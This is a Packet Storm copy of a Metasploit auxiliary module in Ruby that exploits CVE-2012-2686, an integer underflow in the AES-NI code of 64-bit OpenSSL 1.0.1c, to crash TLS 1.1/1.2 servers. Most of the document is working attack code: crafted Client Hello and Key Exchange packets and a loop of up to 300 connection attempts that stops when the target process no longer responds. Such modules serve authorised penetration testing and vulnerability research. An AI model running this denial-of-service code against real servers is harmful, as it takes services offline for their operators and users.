The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the length of an encrypted message when used with a TLS version 1.1 or above. This leads to an integer underflow which can cause a DoS. The vulnerable function aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL. This Metasploit module has been tested successfully on Ubuntu 12.04 (64-bit) with the default OpenSSL 1.0.1c package.
5871459b613b45d42f0cb13e4a97c4441fd3ed0c424828a3919d63334c1585b7##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# auxiliary/dos/ssl/openssl_aesni
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenSSL TLS 1.1 and 1.2 AES-NI DoS',
'Description' => %q{
The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the
length of an encrypted message when used with a TLS version 1.1 or above. This
leads to an integer underflow which can cause a DoS. The vulnerable function
aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.
This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default
OpenSSL 1.0.1c package.
},
'Author' =>
[
'Wolfgang Ettlinger <wolfgang.ettlinger[at]gmail.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2012-2686'],
[ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]
],
'DisclosureDate' => '2013-02-05'))
register_options(
[
Opt::RPORT(443),
OptInt.new('MAX_TRIES', [true, "Maximum number of tries", 300])
])
end
def run
# Client Hello
p1 = "\x16" # Content Type: Handshake
p1 << "\x03\x01" # Version: TLS 1.0
p1 << "\x00\x7e" # Length: 126
p1 << "\x01" # Handshake Type: Client Hello
p1 << "\x00\x00\x7a" # Length: 122
p1 << "\x03\x02" # Version: TLS 1.1
p1 << ("A" * 32) # Random
p1 << "\x00" # Session ID Length: 0
p1 << "\x00\x08" # Cypher Suites Length: 6
p1 << "\xc0\x13" # - ECDHE-RSA-AES128-SHA
p1 << "\x00\x39" # - DHE-RSA-AES256-SHA
p1 << "\x00\x35" # - AES256-SHA
p1 << "\x00\xff" # - EMPTY_RENEGOTIATION_INFO_SCSV
p1 << "\x01" # Compression Methods Length: 1
p1 << "\x00" # - NULL-Compression
p1 << "\x00\x49" # Extensions Length: 73
p1 << "\x00\x0b" # - Extension: ec_point_formats
p1 << "\x00\x04" # Length: 4
p1 << "\x03" # EC Points Format Length: 3
p1 << "\x00" # - uncompressed
p1 << "\x01" # - ansiX962_compressed_prime
p1 << "\x02" # - ansiX962_compressed_char2
p1 << "\x00\x0a" # - Extension: elliptic_curves
p1 << "\x00\x34" # Length: 52
p1 << "\x00\x32" # Elliptic Curves Length: 50
# 25 Elliptic curves:
p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"
p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"
p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"
p1 << "\x00\x11"
p1 << "\x00\x23" # - Extension: SessionTicket TLS
p1 << "\x00\x00" # Length: 0
p1 << "\x00\x0f" # - Extension: Heartbeat
p1 << "\x00\x01" # Length: 1
p1 << "\x01" # Peer allowed to send requests
# Change Cipher Spec Message
p2_cssm = "\x14" # Content Type: Change Cipher Spec
p2_cssm << "\x03\x02" # Version: TLS 1.1
p2_cssm << "\x00\x01" # Length: 1
p2_cssm << "\x01" # Change Cipher Spec Message
# Encrypted Handshake Message
p2_ehm = "\x16" # Content Type: Handshake
p2_ehm << "\x03\x02" # Version: TLS 1.1
p2_ehm << "\x00\x40" # Length: 64
p2_ehm << ("A" * 64) # Encrypted Message
# Client Key Exchange, Change Cipher Spec, Encrypted Handshake
# AES256-SHA
p2_aes_sha = "\x16" # Content Type: Handshake
p2_aes_sha << "\x03\x02" # Version: TLS 1.1
p2_aes_sha << "\x01\x06" # Length: 262
p2_aes_sha << "\x10" # Handshake Type: Client Key Exchange
p2_aes_sha << "\x00\x01\x02" # Length: 258
p2_aes_sha << "\x01\x00" # Encrypted PreMaster Length: 256
p2_aes_sha << ("\x00" * 256) # Encrypted PresMaster (irrelevant)
p2_aes_sha << p2_cssm # Change Cipher Spec Message
p2_aes_sha << p2_ehm # Encrypted Handshake Message
# DHE-RSA-AES256-SHA
p2_dhe = "\x16" # Content Type: Handshake
p2_dhe << "\x03\x02" # Version: TLS 1.1
p2_dhe << "\x00\x46" # Length: 70
p2_dhe << "\x10" # Handshake Type: Client Key Exchange
p2_dhe << "\x00\x00\x42" # Length: 66
p2_dhe << "\x00\x40" # DH Pubkey Length: 64
p2_dhe << ("A" * 64) # DH Pubkey
p2_dhe << p2_cssm # Change Cipher Spec Message
p2_dhe << p2_ehm # Encrypted Handshake Message
# ECDHE-RSA-AES128-SHA
p2_ecdhe = "\x16" # Content Type: Handshake
p2_ecdhe << "\x03\x02" # Version: TLS 1.1
p2_ecdhe << "\x00\x46" # Length: 70
p2_ecdhe << "\x10" # Handshake Type: Client Key Exchange
p2_ecdhe << "\x00\x00\x42" # Length: 66
p2_ecdhe << "\x41" # EC DH Pubkey Length: 65
# EC DH Pubkey:
p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"
p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"
p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"
p2_ecdhe << "\xb2\xe6\x8b\x2a\xd9\x03\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73"
p2_ecdhe << "\x40"
p2_ecdhe << p2_cssm # Change Cipher Spec Message
p2_ecdhe << p2_ehm # Encrypted Handshake Message
maxtries = datastore['MAX_TRIES']
success = false
for i in 0..maxtries
print_status("Try \##{i}")
connect
sock.put(p1)
resp = sock.get_once
cs = get_cipher_suite(resp)
if cs == 0xc013 # ECDHE-RSA-AES128-SHA
p2 = p2_ecdhe
elsif cs == 0x0039 # DHE-RSA-AES256-SHA
p2 = p2_dhe
elsif cs == 0x0035 # AES256-SHA
p2 = p2_aes_sha
else
print_error("No common ciphers!")
return
end
sock.put(p2)
alert = nil
begin
alert = sock.get_once(-1, 2)
rescue EOFError
print_good("DoS successful. process on #{rhost} did not respond.")
success = true
break
end
disconnect
end
if success == false
print_error("DoS unsuccessful.")
end
end
def get_cipher_suite(resp)
offset = 0
while offset < resp.length
type = (resp[offset, 1]).unpack("C")[0]
if not type == 22 # Handshake
return nil
end
len = (resp[offset+3, 2]).unpack("n")[0]
hstype = (resp[offset+5, 1]).unpack("C")[0]
if hstype == 2 # Server Hello
return (resp[offset+44, 2]).unpack("n")[0]
end
offset += len
end
end
end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed